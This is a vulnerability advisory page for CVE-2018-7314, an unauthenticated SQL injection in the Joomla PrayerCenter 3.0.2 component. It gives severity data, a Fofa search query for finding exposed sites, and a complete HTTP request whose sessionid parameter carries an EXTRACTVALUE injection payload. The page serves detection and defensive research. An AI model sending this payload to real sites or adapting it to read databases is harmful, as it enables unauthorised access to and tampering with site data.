🔙 목록으로 돌아가기

CVE-2018-7314: Joomla! Component PrayerCenter 3.0.2 - SQL Injection

TitleJoomla! Component PrayerCenter 3.0.2 - SQL Injection
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Joomla installation.
RemediationRemove the vulnerable PrayerCenter component or upgrade to a patched version.
CVSS Score9.8
EPSS Score0.90805
CVE IDCVE-2018-7314
CWE IDCWE-89
Fofa Queryapp="Joomla!-网站安装"app="joomla!-网站安装"
Tags cve cve2018 joomla sqli mlwebtechnologies vkev vuln

🔍 Vulnerability Description

SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.

🌐 HTTP Request

GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1'+AND+EXTRACTVALUE(22,CONCAT(0x7e,md5(0316)))--+X HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7314.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7314.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A